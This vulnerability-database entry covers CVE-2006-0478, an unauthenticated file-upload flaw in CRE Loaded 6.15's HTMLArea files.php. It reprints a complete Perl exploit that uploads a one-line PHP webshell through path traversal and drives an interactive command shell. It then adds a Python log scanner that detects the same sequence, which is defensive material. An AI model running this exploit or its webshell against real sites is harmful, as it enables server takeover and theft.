CRE Loaded files.php Access Validation Vulnerability

Vulnerability ID 1109670 Vulnerability type Access validation error
Published 2006-01-24 Updated 2007-01-24
CVE ID CVE-2006-0478 CNNVD ID CNNVD-200601-376
Platform PHP CVSS score 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/1446
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-376
|Vulnerability Details
CRE Loaded 6.15 does not require authentication for files.php (the HTMLArea file-manager handler at admin/htmlarea/popups/file/files.php), so a remote attacker can perform privileged operations, including uploading and creating arbitrary files, simply by requesting that script directly. Because the handler also accepts a caller-supplied destination directory (the exploit below passes dirPath=/../images/), a PHP file uploaded into a web-served directory gives the attacker remote command execution in the context of the web server process. Note: the vendor states, "This risk was originally published on our website ... and a patch is also available on the site that will close the vulnerability on all known 6.0x and 6.1x releases. We strongly recommend that CRE Loaded 6.x, osCMax and other osCommerce users who have installed the HTMLArea-based WYSIWYG editor and Admin Access with Levels modify their installations as soon as possible."
|Vulnerability Exploit
#!/usr/bin/perl
#
# creLoaded <= 6.15 HTMLAREA automated perl exploit
# hacked up by kaneda <kaneda@blacksecurity.org>
#
# Rather simple exploit, but still an exploit nonetheless.  Attempts to upload a PHP script
# through the unauthenticated HTMLArea file handler (admin/htmlarea/popups/file/files.php),
# then utilises that script to execute commands and show off a fake shell.
#
# Can specify:
# 	* User-defined PHP script or one provided in this script (suits most occasions)
# 	* Additional variables to pass to PHP script after upload
# 	* HTTP proxy
# 	* GET instead of POST for the command requests (-G)
#
# Read the (messy) code before use.
#
# Greets: nemo, mercy, riotact, zeroday, modem, phildo, gimmemylanta, rodjek, negz
#

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Getopt::Std;
use Term::ReadLine;
use File::Basename;
use URI::Escape;

print "creLoaded <= 6.15 HTMLAREA automated perl exploit\nhacked up by kaneda\n";

# The vulnerable upload handler, relative to the store root given on the command line.
my $baseurl = "/admin/htmlarea/popups/file/files.php";

# Getopt::Std fills $opt_<letter>; declare them so 'use strict' is happy.
our ($opt_s, $opt_p, $opt_a, $opt_G);
getopts('s:p:a:G') or usage();
usage() if @ARGV < 1;

my (%vars, $response, $masterurl, $browser, $cmd);
$masterurl = $ARGV[0];
$masterurl =~ s{/+$}{};		# tolerate a trailing slash on the store URL
$browser = LWP::UserAgent->new;

if($opt_s) {
	print "[*] User-defined script '$opt_s' will be used instead of 'default'\n";
}

if($opt_p) {
	$browser->proxy(['http', 'https'] => $opt_p);
	print "[*] HTTP/HTTPS proxy set to $opt_p\n";
}

if($opt_a) {
	# -a name1=value1,name2=value2 ; split on the first '=' only so values may contain '='
	foreach my $tmpvar (split(/,/, $opt_a)) {
		my ($name, $value) = split(/=/, $tmpvar, 2);
		$value = "" unless defined $value;
		$vars{$name} = $value;
		print "[+] Adding variable '$name' with value '$value'\n";
	}
}

sub usage 
{
	print "usage: creloaded615.pl [-s/path/to/file.php] [-phostname:port] [-avarname1=value1,...,varname2=value2] [-G] URL\n\n";
	print "-a - additional variables i.e. -aaction=create,cid=12\n";
	print "-p - use http/https proxy, format hostname:port i.e. -pmyproxy.com:8080\n";
	print "-s - specify path to user-defined script instead of using default\n";
	print "-G - send command requests with GET instead of POST\n";
	print "URL - http://vuln/store\n\n";
	exit;
}

# Send %vars to the uploaded script (POST by default, GET with -G) and leave the reply in $response.
sub sendform 
{
	if($opt_G) {
		my $url = $masterurl . "?" . join("&", map { "$_=" . uri_escape($vars{$_}) } keys %vars);
		$response = $browser->get($url);
		die "Failed to get!" unless defined $response;
	} else {
		$response = $browser->post($masterurl, \%vars);
		die "Failed to post!" unless defined $response;
	}
}

if(!$opt_s) {
	# Lazy: a one-line command runner; the 'a' parameter carries the command to execute.
	print "[*] Creating 'default' PHP script\n";
	my $tmp = "<?php system(\$a); ?>";
	open(my $out, ">", "/tmp/default.php") or die "Cannot write /tmp/default.php: $!";
	print $out $tmp;
	close($out);
	$opt_s = "/tmp/default.php";
}

# Make sure the script to upload is actually readable before talking to the target.
open(my $in, "<", $opt_s) or die "Cannot read '$opt_s': $!";
close($in);
# LWP sends the local basename as the uploaded filename, so that is what we request afterwards.
my $script = basename($opt_s);

if(!$vars{"dirPath"}) {
	print "[*] Setting upload path to $masterurl/images\n";
	$vars{"dirPath"} = "/../images/";	# relative to the handler's own directory
}
my $target = $masterurl . $baseurl;
print "[*] Abusing creLOADED\n";
$browser->timeout(10);
# Multipart upload straight to files.php: no session cookie, no credentials.
my $req = POST $target, Content_Type => 'form-data', Content => [ actions => "upload", dirPath => $vars{"dirPath"}, upload => [ $opt_s ] ];
$response = $browser->request($req);
print "[!] Upload request returned " . $response->status_line . "\n" unless $response->is_success;
$browser->timeout(180);
my $term = Term::ReadLine->new('cre');

print "[*] Executing 'id' then spawning fake shell\n";
$masterurl = $masterurl . "/images/$script";
$vars{"a"} = "id";
sendform();
print $response->content;
while(1) {
	my $prompt = "bash-2.05b\$ ";
	my $tmp = $term->readline($prompt, "");
	last unless defined $tmp;	# EOF (Ctrl-D)
	$cmd = $tmp;
	
	if(($cmd eq "quit") || ($cmd eq "exit")) {
		exit;
	}

	$vars{"a"} = $cmd;
	sendform();
	print $response->content;
}
# milw0rm.com [2006-01-24]
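
Detection side of the attack chain above, as an added example that is not part of the original advisory or of kaneda's exploit: a Python scan over web-server access logs for the request sequence the exploit produces, a POST to the unauthenticated files.php handler followed by requests to a PHP file under /images/ from the same client. The log lines, client addresses, the libwww-perl user agent and the five-minute correlation window are constructed assumptions for the example.

```python
import re
from datetime import datetime
from urllib.parse import urlsplit

# Constructed Apache combined-format access log (not taken from the advisory); the 10.0.0.9
# lines mirror the exploit's sequence: POST to files.php, then requests to the dropped script.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Jan/2006:10:14:02 +0000] "GET /store/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Jan/2006:10:15:31 +0000] "POST /store/admin/htmlarea/popups/file/files.php HTTP/1.1" 200 412 "-" "libwww-perl/5.803"
10.0.0.9 - - [24/Jan/2006:10:15:32 +0000] "POST /store/images/default.php HTTP/1.1" 200 77 "-" "libwww-perl/5.803"
10.0.0.9 - - [24/Jan/2006:10:15:40 +0000] "GET /store/images/default.php?a=id HTTP/1.1" 200 77 "-" "libwww-perl/5.803"
10.0.0.12 - - [24/Jan/2006:10:16:00 +0000] "GET /store/images/logo.gif HTTP/1.1" 200 9822 "-" "Mozilla/5.0"
10.0.0.12 - - [24/Jan/2006:10:16:05 +0000] "GET /store/admin/login.php HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# The HTMLArea file handler that CRE Loaded <= 6.15 exposed without an admin session.
UPLOAD_HANDLER = "/admin/htmlarea/popups/file/files.php"
# Extensions the web server will normally hand to the PHP interpreter.
SCRIPT_EXTS = (".php", ".php3", ".php4", ".php5", ".phtml")


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = urlsplit(rec["target"]).path  # drop ?a=cmd so the path compares cleanly
    return rec


def hits_upload_handler(rec):
    return rec["path"].endswith(UPLOAD_HANDLER)


def is_script_under_images(rec):
    path = rec["path"].lower()
    return "/images/" in path and path.endswith(SCRIPT_EXTS)


def detect(log_text, window_seconds=300):
    """Scan access-log text and return a list of findings.

    Kinds: handler_probe (GET on files.php), upload_attempt (POST on files.php),
    webshell_execution (script under /images/ requested by a client that POSTed to files.php
    within window_seconds before), script_under_images (same path pattern, no prior upload seen).
    """
    findings = []
    last_upload = {}  # client ip -> time of its most recent POST to the handler
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        kind = None
        if hits_upload_handler(rec):
            kind = "upload_attempt" if rec["method"] == "POST" else "handler_probe"
            if rec["method"] == "POST":
                last_upload[rec["ip"]] = rec["ts"]
        elif is_script_under_images(rec):
            prior = last_upload.get(rec["ip"])
            recent = prior is not None and 0 <= (rec["ts"] - prior).total_seconds() <= window_seconds
            kind = "webshell_execution" if recent else "script_under_images"
        if kind:
            findings.append({"ip": rec["ip"], "ts": rec["ts"].isoformat(), "kind": kind,
                             "path": rec["target"], "status": rec["status"], "ua": rec["ua"]})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']:<10} {f['kind']:<20} {f['status']} {f['path']}")
```

Run it over a real log with detect(open(path).read()). Since the POST body is not logged, an upload_attempt finding cannot confirm that actions=upload and a traversing dirPath were sent; treat the correlated webshell_execution kind as the high-confidence signal and the bare handler hits as leads to check against the admin login records.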
|References

Source: BID
Name: 16415
Link: http://www.securityfocus.com/bid/16415
Source: VUPEN
Name: ADV-2006-0373
Link: http://www.frsirt.com/english/advisories/2006/0373
Source: SECUNIA
Name: 18648
Link: http://secunia.com/advisories/18648
Source: XF
Name: creloaded-files-auth-bypass(24377)
Link: http://xforce.iss.net/xforce/xfdb/24377
Source: OSVDB
Name: 22793
Link: http://www.osvdb.org/22793
Source: VIM
Name: 20060203 vendor ack/fix: 22793: CRE Loaded files.php Unauthenticated Arbitrary File Upload (fwd)
Link: http://www.attrition.org/pipermail/vim/2006-February/000527.html